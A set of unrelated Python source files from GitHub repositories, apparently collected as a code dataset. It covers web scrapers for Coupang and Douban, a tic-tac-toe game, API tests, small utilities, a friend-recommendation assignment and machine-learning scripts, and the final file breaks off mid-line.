model = pd.read_csv(\"protVec_100d_3grams.csv\", header=None)\n # List to store results\n vecs = []\n # Read receptor data\n dir_name = sys.argv[1].rstrip(\"/\")\n receptors = glob.glob(dir_name + \"/*.txt\")\n # Start process pool\n pool = Pool(processes=4)\n vecs.append(pool.map(vectorize, receptors))\n vecs = vecs[0]\n vecs_df = pd.DataFrame(vecs)\n vecs_df.to_csv(dir_name + \"_vec.csv\", index=False)\n","repo_name":"ravila4/DTIpred","sub_path":"src/features/prot2vec.py","file_name":"prot2vec.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16593486898","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport re\r\nimport os\r\nimport csv\r\n\r\n# http://www.useragentstring.com/ 의 내용 복사\r\nheaders = {'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36'}\r\n\r\nos.chdir(r'C:/pyml-master/coupang')\r\n\r\nbrandName = '헤라' #검색어(브랜드네임) 지정\r\npage = 3 #페이지수 지정\r\n\r\n\r\ndatalist=[]\r\nfor i in range(1,page+1):\r\n url = \"https://www.coupang.com/np/products/brand-shop?brandName=\"+brandName+\"&page=\"+str(i)\r\n resp = requests.get(url, headers = headers)\r\n soup = BeautifulSoup(resp.text, features='lxml')\r\n url2 = soup.find_all(\"a\", class_ = \"baby-product-link\")\r\n for j in range(0, len(url2)):\r\n a=url2[j].attrs['href']\r\n b=url2[j].find(\"div\", class_ =\"name\")\r\n c=url2[j].find(\"strong\", class_ =\"price-value\")\r\n name=b.get_text(\" \", strip=True)\r\n price=c.get_text(\" \", strip=True)\r\n url3= \"https://www.coupang.com\"+a\r\n data = []\r\n data.append(url3)\r\n data.append(name)\r\n data.append(price)\r\n datalist.append(data)\r\n s=(j+1)+60*(i-1)\r\n print(str(s)+\".\", \"[ \"+url3+\" ],\", \"[ \"+name+\" ],\", \"[ \"+price+\"원 ]\")\r\n resp2 = requests.get(url3, headers = headers)\r\n soup = resp2.text\r\n coup = re.findall('\"origin\":\".*?jpg\"}]', soup, flags=re.IGNORECASE)\r\n \r\n if len(coup) == 0:\r\n coup = re.findall('\"origin\":\".*?g\"}]', soup, flags=re.IGNORECASE)\r\n coup2 = \"\".join(coup[0])\r\n coup3 = re.findall('\"origin\":\".*?g\"', coup2, flags=re.IGNORECASE)\r\n for k in range(len(coup3)):\r\n img = coup3[k][10:-1]\r\n img2 = \"https:\"+img\r\n print(img2)\r\n r = requests.get(img2)\r\n file = open(\"{0:04}-\".format(s)+\"{0:04}.jpg\".format(k+1),\"wb\")\r\n file.write(r.content)\r\n file.close()\r\n else :\r\n coup2 = \"\".join(coup[0])\r\n coup3 = re.findall('\"origin\":\".*?g\"', coup2, flags=re.IGNORECASE)\r\n for k in range(len(coup3)):\r\n img = coup3[k][10:-1]\r\n img2 = \"https:\"+img\r\n print(img2)\r\n r = requests.get(img2)\r\n file = open(\"{0:04}-\".format(s)+\"{0:04}.jpg\".format(k+1),\"wb\")\r\n file.write(r.content)\r\n file.close()\r\n \r\nwith open(brandName+'.csv','w', newline='') as f: \r\n a = csv.writer(f) \r\n for value in datalist: \r\n a.writerow(value)\r\n","repo_name":"jslim7812/JHLEE","sub_path":"coupang.py","file_name":"coupang.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74465433449","text":"import pygame\nimport time\nimport random\nimport tictactoe_engine\nimport common_variables\nimport tictactoe_players\nfrom tictactoe_engine import *\nfrom common_variables import *\nfrom tictactoe_players import *\nfrom pygame.locals import *\n\n# set board for play\ndef play():\n global DISPLAY, board\n engine = Engine()\n buttons = Buttons()\n mouse_x = 0\n mouse_y = 0\n board = [' ' for i in range (9)]\n new_board = False\n click = False\n wait_loop = 180\n win = []\n start = True\n blink = [i for i in range(200)]\n round_end = False\n count_board = 1\n switch = True\n quit = False\n pygame.init()\n DISPLAY = pygame.display.set_mode((W_WIDTH, W_HEIGHT))\n pygame.display.set_caption('tictactoe')\n clock = pygame.time.Clock()\n wall_image = pygame.image.load(engine.select_image())\n pygame.mixer.music.load('music/music.ogg')\n pygame.mixer.music.play(-1)\n \n while True:\n if start == True and wait_loop == 180:\n DISPLAY.blit(wall_image, (0, 0))\n buttons.draw_title(DISPLAY)\n squareI, squareII, squareIII, squareIV = buttons.draw_headers(DISPLAY)\n \n elif round_end == True and new_board == False and wait_loop < 180: \n DISPLAY.blit(wall_image, (0, 0)) \n buttons.draw_winner(playerI, playerII, 
DISPLAY)\n if wait_loop == 179:\n wall_image = pygame.image.load(engine.select_image())\n round_end = False \n\n elif start == False:\n DISPLAY.blit(wall_image, (0, 0))\n pygame.draw.aaline(DISPLAY, CHALK, (MARGIN_X + W_SPACE, MARGIN_Y), \n (MARGIN_X + W_SPACE, W_HEIGHT - MARGIN_Y), 4)\n pygame.draw.aaline(DISPLAY, CHALK, (MARGIN_X + (2 * W_SPACE), MARGIN_Y), \n (W_WIDTH - MARGIN_X - W_SPACE, W_HEIGHT - MARGIN_Y), 4)\n pygame.draw.aaline(DISPLAY, CHALK, (MARGIN_X, MARGIN_Y + W_SPACE), \n (W_WIDTH - MARGIN_X, MARGIN_Y + W_SPACE), 4)\n pygame.draw.aaline(DISPLAY, CHALK, (MARGIN_X, W_HEIGHT - MARGIN_Y - W_SPACE), \n (W_WIDTH - MARGIN_X, W_HEIGHT - MARGIN_Y - W_SPACE), 4) \n \n for count, value in enumerate(board):\n point_X = engine.convert_to_X(count)\n point_Y = engine.convert_to_Y(count)\n if value == 'X' and count not in win:\n pygame.draw.line(DISPLAY, BROWN, \n ((point_X * W_SPACE) + GAP + MARGIN_X,\n (point_Y * W_SPACE) + GAP + MARGIN_Y),\n ((point_X * W_SPACE) + W_SPACE - GAP + MARGIN_X,\n (point_Y * W_SPACE) + W_SPACE - GAP + MARGIN_Y),\n 7)\n pygame.draw.line(DISPLAY, BROWN,\n ((point_X * W_SPACE) + W_SPACE - GAP + MARGIN_X,\n (point_Y * W_SPACE) + GAP + MARGIN_Y),\n ((point_X * W_SPACE) + GAP + MARGIN_X,\n (point_Y * W_SPACE) + W_SPACE - GAP + MARGIN_Y),\n 7)\n \n elif value == 'O' and count not in win:\n pygame.draw.circle(DISPLAY, BROWN,\n ((point_X * W_SPACE) + HALF + MARGIN_X,\n (point_Y * W_SPACE) + HALF + MARGIN_Y), \n HALF - GAP, \n 7)\n \n if (value == 'X' and count in win \n and (wait_loop in blink[0:20] \n or wait_loop in blink[40:60] \n or wait_loop in blink[80:100] \n or wait_loop in blink[120:140]\n or wait_loop in blink[160:180])):\n pygame.draw.line(DISPLAY, BROWN, \n ((point_X * W_SPACE) + GAP + MARGIN_X,\n (point_Y * W_SPACE) + GAP + MARGIN_Y),\n ((point_X * W_SPACE) + W_SPACE - GAP + MARGIN_X,\n (point_Y * W_SPACE) + W_SPACE - GAP + MARGIN_Y),\n 7)\n pygame.draw.line(DISPLAY, BROWN,\n ((point_X * W_SPACE) + W_SPACE - GAP + MARGIN_X,\n (point_Y * W_SPACE) + GAP + MARGIN_Y),\n ((point_X * W_SPACE) + GAP + MARGIN_X,\n (point_Y * W_SPACE) + W_SPACE - GAP + MARGIN_Y),\n 7)\n \n elif (value == 'O' and count in win\n and (wait_loop in blink[0:20] \n or wait_loop in blink[40:60] \n or wait_loop in blink[80:100] \n or wait_loop in blink[120:140]\n or wait_loop in blink[160:180])):\n pygame.draw.circle(DISPLAY, BROWN,\n ((point_X * W_SPACE) + HALF + MARGIN_X,\n (point_Y * W_SPACE) + HALF + MARGIN_Y), \n HALF - GAP, \n 7) \n \n for event in pygame.event.get():\n if event.type == QUIT or quit:\n pygame.quit()\n elif event.type == MOUSEMOTION:\n mouse_x, mouse_y = event.pos\n elif event.type == MOUSEBUTTONUP:\n mouse_x, mouse_y = event.pos\n click = True\n \n # this variable prevents to display players move in the same time\n if wait_loop < 180:\n wait_loop += 1\n # create new board \n if new_board == True and wait_loop == 180:\n count_board += 1\n board = [' ' for i in range(9)]\n new_board = False\n wait_loop = 0\n if count_board > 10:\n count_board = 0\n round_end = True\n start = True\n wait_loop = 0\n else:\n time.sleep(1)\n \n # check if sound button pressed\n sound = buttons.draw_sound_icon(switch, DISPLAY)\n if sound.collidepoint(mouse_x, mouse_y):\n if buttons.sizeIV <= 20:\n buttons.sizeIV += 1\n elif buttons.sizeIV <= 21 and buttons.sizeIV >= 18:\n buttons.sizeIV -= 1\n if sound.collidepoint(mouse_x, mouse_y) and click == True:\n if switch == True:\n switch = False\n else:\n switch = True\n engine.music(switch)\n click = False \n \n if start == True :\n # draw 
bigger text if cursor on it\n # if cursor not on it come back to orginal size\n if squareI.collidepoint(mouse_x, mouse_y):\n if buttons.sizeI < 55:\n buttons.sizeI += 1\n else:\n if buttons.sizeI > 40:\n buttons.sizeI -= 1\n if squareII.collidepoint(mouse_x, mouse_y):\n if buttons.sizeII < 55:\n buttons.sizeII += 1\n else:\n if buttons.sizeII > 40:\n buttons.sizeII -= 1\n if squareIII.collidepoint(mouse_x, mouse_y):\n if buttons.sizeIII < 55:\n buttons.sizeIII += 1\n else:\n if buttons.sizeIII > 40:\n buttons.sizeIII -= 1\n if squareIV.collidepoint(mouse_x, mouse_y):\n if buttons.sizeVI < 55:\n buttons.sizeVI += 1\n else:\n if buttons.sizeVI > 40:\n buttons.sizeVI -= 1\n \n if squareI.collidepoint(mouse_x, mouse_y) and click == True:\n playerI = Player('X', True)\n playerII = Player('O', 'easy')\n start = False\n click = False\n current_player = playerI\n elif squareII.collidepoint(mouse_x, mouse_y) and click == True:\n playerI = Player('X', True)\n playerII = Player('O', 'normal')\n start = False\n click = False\n current_player = playerI\n elif squareIII.collidepoint(mouse_x, mouse_y) and click == True:\n playerI = Player('X', True)\n playerII = Player('O', 'hard')\n start = False\n click = False\n current_player = playerI\n elif squareIV.collidepoint(mouse_x, mouse_y) and click == True:\n quit = True \n \n elif start == False:\n square_X, square_Y, index = engine.transform_pixel(mouse_x, mouse_y, board)\n if square_X != None and square_Y != None :\n buttons.highlight(square_X, square_Y, DISPLAY)\n # human player move \n if (click == True \n and square_X != None \n and square_Y != None \n and current_player.kind == True\n and new_board == False):\n engine.update_board(board, index, current_player.symbol)\n current_player = playerII\n click = False\n wait_loop = 0\n win = engine.check_winner(board, playerI.symbol)\n if win != []:\n playerI.score += 1\n new_board = True\n wait_loop = 0\n elif ' ' not in board:\n new_board = True\n wait_loop = 0\n # artificial player move \n elif (current_player.kind != True \n and wait_loop == 2\n and new_board == False):\n choice = current_player.artificial_move(board, engine)\n engine.update_board(board, choice, current_player.symbol)\n current_player = playerI\n win = engine.check_winner(board, playerII.symbol)\n if win != []:\n playerII.score += 1\n new_board = True\n wait_loop = 0\n elif ' ' not in board:\n new_board = True\n wait_loop = 0\n else:\n time.sleep(1)\n\n buttons.draw_score_icon(playerI, playerII, count_board, DISPLAY)\n exit = buttons.draw_exit_icon(DISPLAY)\n if exit.collidepoint(mouse_x, mouse_y):\n if buttons.sizeV<= 20:\n buttons.sizeV += 1\n if click == True:\n new_board = True\n wait_loop = 180\n count_board = 11\n click = False\n elif buttons.sizeV <= 21 and buttons.sizeV >= 18:\n buttons.sizeV -= 1\n \n pygame.display.update()\n clock.tick(FPS) \n \nplay()\n\n \n","repo_name":"Greenpaul11/Python_Projects","sub_path":"TICTACTOE_PYGAME/tictactoe_pygame/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":11341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5840967789","text":"import os\nimport json\nimport random\nimport allure\nfrom helpers.idslist import get_id_user_list\nimport pytest\nfrom assertpy.assertpy import assert_that\nfrom cerberus import Validator\nfrom dotenv import load_dotenv\n\n\nfrom crud_users import CrudUser\nfrom helpers.login import Login\nfrom helpers.name_generator import User_Data\n\nload_dotenv()\nID = os.getenv('ID_USER')\nURL = 
os.getenv('BASE_URL')\nTOKEN = os.getenv('ACCESS_TOKEN')\nUSER = os.getenv('USER')\nPASSWORD = os.getenv('PASSWORD')\n\n\n@pytest.fixture(scope=\"function\")\n@allure.step('Get the users')\ndef preconditions():\n file = open('./testdata/get_user/get_user.json', \"r\")\n input_data = json.loads(file.read())\n result = get_id_user_list(input_data)\n return result\n\n\n@pytest.mark.sanity\n@pytest.mark.regression\n@pytest.mark.black_box\n@pytest.mark.acceptance\n@allure.severity(allure.severity_level.CRITICAL)\n@allure.description(\"Verify if response is 200 when is updated the users successfully\")\ndef test_update_user_success(preconditions):\n User_Data().aleatory_email('update_user/update_user.json')\n User_Data().aleatory_name('update_user/update_user.json')\n User_Data().aleatory_first_name('update_user/update_user.json')\n User_Data().aleatory_last_name('update_user/update_user.json')\n User_Data().aleatory_roles('update_user/update_user.json')\n file = open('./testdata/update_user/update_user.json', \"r\")\n input_data = json.loads(file.read())\n crud_users = CrudUser()\n data = preconditions\n id_users = random.choice(data)\n response = crud_users.update_user(URL, TOKEN, input_data, id_users)\n assert_that(response.status_code).is_equal_to(200)\n data = json.loads(response.text)\n assert_that(data[\"email\"]).contains(input_data['email'])\n assert_that(data[\"name\"]).contains(input_data['name'])\n assert_that(data[\"first_name\"]).contains(input_data['first_name'])\n assert_that(data[\"last_name\"]).contains(input_data['last_name'])\n assert_that(data[\"roles\"][0]).contains(input_data['roles'])\n\n\n@pytest.mark.sanity\n@pytest.mark.regression\n@pytest.mark.acceptance\n@allure.severity(allure.severity_level.CRITICAL)\n@allure.description(\"Verify schema of users update is correct\")\ndef test_update_schema_users(preconditions):\n Login().login(USER, PASSWORD)\n User_Data().aleatory_email('update_user/update_user.json')\n User_Data().aleatory_name('update_user/update_user.json')\n User_Data().aleatory_first_name('update_user/update_user.json')\n User_Data().aleatory_last_name('update_user/update_user.json')\n User_Data().aleatory_roles('update_user/update_user.json')\n file = open('./testdata/update_user/update_user.json', \"r\")\n schema = open('./testdata/update_user/schema.json', \"r\")\n input_data = json.loads(file.read())\n output_data = json.loads(schema.read())\n crud_user = CrudUser()\n data = preconditions\n id_users = random.choice(data)\n response = crud_user.update_user(URL, TOKEN, input_data, id_users)\n # Error response\n assert_that(response.status_code).is_equal_to(200)\n validator = Validator(output_data, require_all=False)\n print(validator)\n is_valid = validator.validate(response.as_dict)\n assert_that(is_valid, description=validator.errors).is_true()\n\n\n@pytest.mark.black_box\n@pytest.mark.negative\n@pytest.mark.security\n@pytest.mark.regression\n@allure.severity(allure.severity_level.MINOR)\n@allure.description(\"Verify the response is 401 when is added with an invalid authorization token\")\ndef test_update_users_invalid_token(preconditions):\n Login().login(USER, PASSWORD)\n file = open('./testdata/update_user/update_user.json', \"r\")\n input_data = json.loads(file.read())\n crud_user = CrudUser()\n data = preconditions\n id_users = random.choice(data)\n response = crud_user.update_user(URL, \"TOKEN\", input_data, id_users)\n # Verify the response is 401 when is added with an invalid authorization token\n 
assert_that(response.status_code).is_equal_to(401)\n\n\n@pytest.mark.black_box\n@pytest.mark.negative\n@pytest.mark.regression\n@allure.severity(allure.severity_level.MINOR)\n@allure.description(\"Validate the response is 404 when is added with a invalid id\")\ndef test_update_users_invalid_id():\n Login().login(USER, PASSWORD)\n invalid_id = 1000\n file = open('./testdata/update_user/update_user.json', \"r\")\n input_data = json.loads(file.read())\n crud_user = CrudUser()\n response = crud_user.update_user(URL, TOKEN, input_data, invalid_id)\n # Validate the response is 404 when is added with a invalid id\n assert_that(response.status_code).is_equal_to(404)\n\n\n@pytest.mark.black_box\n@pytest.mark.negative\n@allure.severity(allure.severity_level.MINOR)\n@allure.description(\"Verify if the email is invalid when send the incorrect information\")\ndef test_update_users_invalid_email(preconditions):\n Login().login(USER, PASSWORD)\n User_Data().aleatory_name('update_user/invalid_email.json')\n User_Data().aleatory_first_name('update_user/invalid_email.json')\n User_Data().aleatory_last_name('update_user/invalid_email.json')\n User_Data().aleatory_roles('update_user/invalid_email.json')\n file = open('./testdata/update_user/invalid_email.json', \"r\")\n input_data = json.loads(file.read())\n crud_user = CrudUser()\n data = preconditions\n id_users = random.choice(data)\n response = crud_user.update_user(URL, TOKEN, input_data, id_users)\n # Verify when author email is filled with invalid param display a response 400\n assert_that(response.status_code).is_equal_to(400)\n\n\n@pytest.mark.black_box\n@pytest.mark.negative\n@pytest.mark.regression\n@allure.severity(allure.severity_level.NORMAL)\n@allure.description(\"Verify if the data is empty when send the missing information\")\ndef test_update_users_empty_data(preconditions):\n Login().login(USER, PASSWORD)\n User_Data().aleatory_email('update_user/empty.json')\n file = open('./testdata/update_user/empty.json', \"r\")\n input_data = json.loads(file.read())\n crud_user = CrudUser()\n data = preconditions\n id_users = random.choice(data)\n response = crud_user.update_user(URL, TOKEN, input_data, id_users)\n # Successfully response\n assert_that(response.status_code).is_equal_to(400)\n","repo_name":"ApiTesting-AT16/ApicitosFramework","sub_path":"tests/test_update_user.py","file_name":"test_update_user.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31847607987","text":"__author__ = 'chenliang'\n\nimport os\n\nfor root, dirs, files in os.walk(\"/Users/chenliang/git_projects/connect/connect/Resources/icons\"):\n for name in dirs:\n # os.rmdir()\n k = os.path.join(root, name)\n count = len(os.listdir(os.path.join(root, name)))\n if count <= 0:\n os.rmdir(k)\n","repo_name":"angelleecash/python","sub_path":"rm_empty_dir.py","file_name":"rm_empty_dir.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12088907056","text":"import csv\nfrom collections import defaultdict\n\n\ndef ctree():\n\n return defaultdict(ctree)\n\n\ndef build_leaf(name, leaf):\n \n res = {\"name\": name}\n\n # add children node if the leaf actually has any children\n if len(leaf.keys()) > 0:\n res[\"children\"] = [build_leaf(k, v) for k, v in leaf.items()]\n\n return res\n\n\ndef main():\n \n tree = ctree()\n # NOTE: you need to have test.csv file as neighbor to this file\n 
with open('Student_Behaviour.csv') as csvfile:\n reader = csv.reader(csvfile)\n for rid, row in enumerate(reader):\n\n # skipping first header row. remove this logic if your csv is\n # headerless\n if rid == 0:\n continue\n\n # usage of python magic to construct dynamic tree structure and\n # basically grouping csv values under their parents\n leaf = tree[row[0]]\n for cid in range(1, len(row)):\n leaf = leaf[row[cid]]\n\n # building a custom tree structure\n res = []\n for name, leaf in tree.items():\n res.append(build_leaf(name, leaf))\n\n # printing results into the terminal\n import json\n print(json.dumps(res))\n\n\n# so let's roll\nmain()","repo_name":"TornadoTebbe/Elm-Visualisation","sub_path":"Daten/pytojson.py","file_name":"pytojson.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21663682292","text":"\"\"\"\nThis script provides an example of how to call model_trainer.py\n\"\"\"\n\nfrom importlib import reload\n\nimport math\nimport torch\nimport torch.distributions as distribs\nimport numpy as np\n\nimport src.model_trainer\nreload(src.model_trainer)\nfrom src.model_trainer import ex # importing experiment here is crucial (why?)\n\nfrom sacred.observers import FileStorageObserver, RunObserver\n\nimport os\n\n# don't record information in the file system, just investigate where the program fails\ndebug_mode = False\n\n\n# this is a custom distribution that I use for some the experiments with block orthogonal initialization\nclass MyDistrib(distribs.distribution.Distribution):\n\n def __init__(self, angle: float, variance: float):\n\n super(MyDistrib, self).__init__()\n\n self.bern = distribs.bernoulli.Bernoulli(torch.tensor([0.5]))\n self.normal = distribs.normal.Normal(torch.zeros((1)), torch.tensor([variance]))\n\n self.angle = angle\n\n def sample(self):\n\n result = self.angle*(2.0*self.bern.sample() - 1.0)\n result += self.normal.sample()\n return result\n\n\n# custom configuration\n# it should be noted that when architecture is REGRESSION\n# most of the optimization is just handled by sklearn\n# all that matters is lag and window\nconfig_updates = {\n 'architecture': \"GRU\",\n 'readout': \"linear\",\n 'optmzr': \"Adam\",\n 'init': \"blockortho\",\n #'parity': \"rotate\",\n #'t_distrib': MyDistrib(0.25*math.pi, 0.01),\n 'path': \"models/216/final_state_dict.pt\",\n\n 'dataset': \"JSB_Chorales\",\n\n 'low_off_notes': 27,\n 'high_off_notes': 75,\n\n 'num_epochs': 200,\n #'hps_epochs': 100,\n 'hidden_size': 120,\n 'scale': 0.01,\n\n #'lag': 1,\n #'window': 1,\n\n 'decay': 0.98,\n 'lr': 0.00316,\n 'regularization': 0.0,\n\n 'do_hpsearch': False,\n 'decays': [1.0],\n #'regularizations': [0.0001],\n #'learning_rates': 10**np.linspace(-1, -3, num=5),\n\n 'save_init_model': True,\n 'save_final_model': True\n }\n\n\nif __name__ == \"__main__\":\n\n base_dir = os.getcwd()\n\n if debug_mode:\n\n # run the experiment without an observer\n ex.run(config_updates={**config_updates})\n result = ex.current_run.result\n\n else:\n\n # store in local directory for now\n ex.observers.append(FileStorageObserver(base_dir + '/models'))\n\n # run the experiment after adding observer\n ex.run(config_updates={**config_updates})\n result = 
ex.current_run.result","repo_name":"catniplab/ML-music-analysis","sub_path":"train_example.py","file_name":"train_example.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"19293663237","text":"import re\nfrom urllib.request import urlopen\n\n\ndef get_page(url):\n response = urlopen(url)\n return response.read().decode(\"utf-8\")\n\n\ndef parse_page(s):\n ret = re.findall(\n '<div class=\"item\">.*?<div class=\"pic\">.*?<em .*?>(?P<id>\d+).*?<span class=\"title\">(?P<title>.*?)</span>'\n '.*?<span class=\"rating_num\" .*?>(?P<rating_num>.*?)</span>.*?<span>(?P<comment_num>.*?)评价</span>', s, re.S)\n return ret\n\n\ndef main(num):\n url = 'https://movie.douban.com/top250?start=%s&filter=' % num\n response_html = get_page(url)\n ret = parse_page(response_html)\n return ret\n\n\ncount = 0\nfor i in range(5):\n ret = main(count)\n # 将爬取到的电影排名, 写入到文件里\n with open(\"movie.txt\", \"a\", encoding=\"utf-8\") as f1:\n f1.write(str(ret))\n count += 25\n\n\n","repo_name":"fengzongming/python_practice","sub_path":"day18_re模块/demo_04_爬虫的例子.py","file_name":"demo_04_爬虫的例子.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19381050513","text":"#Family name: Tara\n# Student number: 300018569\n# Course: IT1 1120 \n# Assignment Number: 5\nclass Person:\n\n # YOUR CODE GOES HERE\n def __init__(self, uid, name, friends = []):\n \"\"\"(Person, int, string, list of int) -> None\"\"\"\n self.id = uid\n self.name = name\n self.friends = friends[:]\n\n def __repr__(self):\n \"\"\"(Person) -> str\"\"\"\n return \"Person({},{},{})\".format(self.id, self.name, self.friends)\n def get_friends(self):\n \"\"\"(Person) -> list\"\"\"\n return self.friends\n def add_friend(self, uid):\n \"\"\"(Person, int) -> None\"\"\"\n self.friends.append(uid)\nclass Network:\n # YOUR CODE GOES HERE\n def __init__(self, name_file, id_file):\n \"\"\"(Network, str, str) -> None\"\"\"\n self.network = []\n n_f = open(name_file).read().splitlines()\n friends = open(id_file).read().splitlines()\n\n for query in n_f:\n id_name = query.split(\"\\t\")\n self.network.append(Person(int(id_name[0]), id_name[1]))\n\n del friends[0]\n \n \n for i in range(len(friends)):\n nums = friends[i].split(\" \")\n curr_id = int(nums[0])\n connection = int(nums[1])\n friends[i] = [curr_id,connection]\n\n\n for i in range(len(friends)): \n curr_user = friends[i][0]\n connection = friends[i][1]\n id_user = self.search_id(curr_user)\n id_conn = self.search_id(connection)\n self.network[id_user].add_friend(connection)\n self.network[id_conn].add_friend(curr_user)\n\n\n def __repr__(self):\n \"\"\"(Network) -> str\"\"\"\n return \"Network({})\".format(self.network)\n\n\n def __len__(self):\n \"\"\"(Network) -> int\"\"\"\n return len(self.network)\n\n\n def recommend(self, user):\n \"\"\"(Network, int)->int or None\"\"\"\n user_friends = self.network[self.search_id(user)].get_friends()\n user_friends = set(user_friends)\n candidates = {p.id for p in self.network}\n candidates = candidates - user_friends\n candidates = candidates - {user}\n recommended = [0]\n \n for candidate in candidates:\n num = len(self.getCommonFriends(user, candidate))\n if num > 0:\n if len(recommended) != 2:\n recommended[0] = candidate\n recommended.append(num)\n if num > recommended[1] or num == recommended[1] and recommended[0] > candidate:\n recommended.pop()\n recommended.pop()\n recommended.append(candidate)\n recommended.append(num)\n\n \n if len(recommended) == 2:\n return recommended[0]\n\n\n def getCommonFriends(self, user1, user2):\n \"\"\"(Network, int, int) -> list\"\"\"\n common=[]\n \n friends_of_user1 = self.network[self.search_id(user1)].get_friends()\n friends_of_user2 = self.network[self.search_id(user2)].get_friends()\n index_user1 = 0\n index_user2 = 0\n\n while index_user1 < len(friends_of_user1) and index_user2 < len(friends_of_user2):\n if friends_of_user1[index_user1] < friends_of_user2[index_user2]:\n index_user1 += 
1\n elif friends_of_user2[index_user2] < friends_of_user1[index_user1]:\n index_user2 += 1\n else:\n common.append(friends_of_user1[index_user1])\n index_user1 += 1\n index_user2 += 1\n\n return common\n\n def get_uid(self):\n \"\"\"(Network)->int\"\"\"\n\n index = -1\n \n while index == -1:\n \n try:\n uid = int(input(\"Enter an integer for a user ID: \").strip())\n index = self.search_id(uid)\n \n if index == -1:\n print(\"That user ID does not exist. Try again\")\n \n except ValueError:\n print(\"That was not an integer. Please try again.\")\n \n return uid\n\n def search_id(self, value):\n \"\"\"(Network, int) -> int\"\"\"\n \n end = len(self.network) -1\n begin = 0\n \n while end - begin > 1:\n mid = (end+begin)//2\n key = self.network[mid].id\n if key < value:\n begin = mid + 1\n elif key > value:\n end = mid - 1\n else: #foundit\n return mid\n if self.network[begin].id == value:\n return begin\n elif self.network[end].id == value:\n return end\n \n return -1 \n\n \n \n\n\ndef get_int():\n '''None->int or None'''\n num = None\n try:\n num=int(input(\"Enter an integer for a user ID:\").strip())\n except ValueError:\n print(\"That was not an integer. Please try again.\")\n return num \n\ndef is_valid_file_name():\n '''None->str or None'''\n file_name = None\n try:\n file_name=input(\"Enter the name of the file: \").strip()\n f=open(file_name)\n f.close()\n except FileNotFoundError:\n print(\"There is no file with that name. Try again.\")\n file_name=None\n return file_name \n\ndef get_file_name():\n '''()->str'''\n file_name=None\n while file_name==None:\n file_name=is_valid_file_name()\n return file_name\n \n \n\n##############################\n# main\n##############################\nprint(\"Let's get first file that contains IDs and names:\")\nfile_name1=get_file_name()\nprint(\"Let's get the 2nd file that contains pairs of friends as in Assignment 4\")\nfile_name2=get_file_name()\n\n\nnet=Network(file_name1,file_name2)\nprint(\"Here are all the people in the network, if the network has at most 20 users:\")\nif len(net)<=20:\n print(net)\n\n\nprint(\"\\nLet's recommend a friend for a user you specify.\")\nuid=net.get_uid()\nrec=net.recommend(uid)\nif rec==None:\n print(\"We have nobody to recommend for user with ID\", uid, \"since he/she is dominating in their connected component\")\nelse:\n print(\"For user with ID\", uid,\"we recommend the user with ID\",rec)\n print(\"That is because users\", uid, \"and\",rec, \"have\", len(net.getCommonFriends(uid,rec)), \"common friends and\")\n print(\"user\", uid, \"does not have more common friends with anyone else.\")\n \n\nprint(\"\\nFinally, you showed interest in knowing common friends of some pairs of users.\")\nprint(\"About 1st user ...\")\nuid1=net.get_uid()\nprint(\"About 2st user ...\")\nuid2=net.get_uid()\nprint(\"Here is the list of common friends of\", uid1, \"and\", uid2)\ncommon=net.getCommonFriends(uid1,uid2)\nfor item in common:\n print(item, end=\" \")\n\n\n\n \n","repo_name":"SahilTara/ITI1120","sub_path":"ASSIGNMENTS/assignment5-students/a5_bonus_300018569.py","file_name":"a5_bonus_300018569.py","file_ext":"py","file_size_in_byte":6714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18781169749","text":"from unicodedata import bidirectional\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.autograd import Variable \nfrom LSTM_train import 
LSTM\n\ndevice = 'cuda:0'\nval_set = np.load('val.npy', allow_pickle=True)\ntrain_set = np.load('train.npy', allow_pickle=True)\nend_token = torch.zeros([1, 20])\n\nmodel = LSTM(20, 60, 4).to(device)\nmodel.load_state_dict(torch.load('lstm.pth'))\nlr = .001\nepochs = 100\ncriterion = nn.CrossEntropyLoss()\n\n# Getting the training set 3-gram, go through the training set and get the values of a window of 3 amino acids\n# the indices in sequence count correspond to the sequence, so add one if found to the correct index\nsequence_count = torch.zeros([20, 20, 20])\nfor i in range(len(train_set)):\n for j in range(len(train_set[i])-3):\n index_1 = np.argmax(train_set[i][j], axis=0)\n index_2 = np.argmax(train_set[i][j+1], axis=0)\n index_3 = np.argmax(train_set[i][j+2], axis=0)\n\n sequence_count[index_1][index_2][index_3] += 1\n\n# divide by the training set to get probs\nsequence_count /= len(train_set)\nsequence_count = sequence_count.flatten()\n\nplt.plot(sequence_count)\nplt.show()\n\n# Get the model 3-gram, generate a sequence while taking the probabilities of p(a)p(b|a)p(c|a,b)\nmodel_probs = torch.empty([20, 20, 20])\nwith torch.no_grad():\n one_hot = torch.zeros([1, 100, 20])\n for i in range(20):\n for j in range(20):\n for k in range(20):\n # first input, all zeros to get prob of first term (ex. A)\n one_hot = torch.zeros([1, 100, 20]).to(device)\n pred = model(one_hot)\n pred = pred[-1]\n pred = nn.functional.softmax(pred)\n first_prob = pred[i]\n\n # second input, add the current term to the sequence to generate next\n # probability for index j, ex. (A, [end])\n one_hot[0][98][i] += 1\n pred = 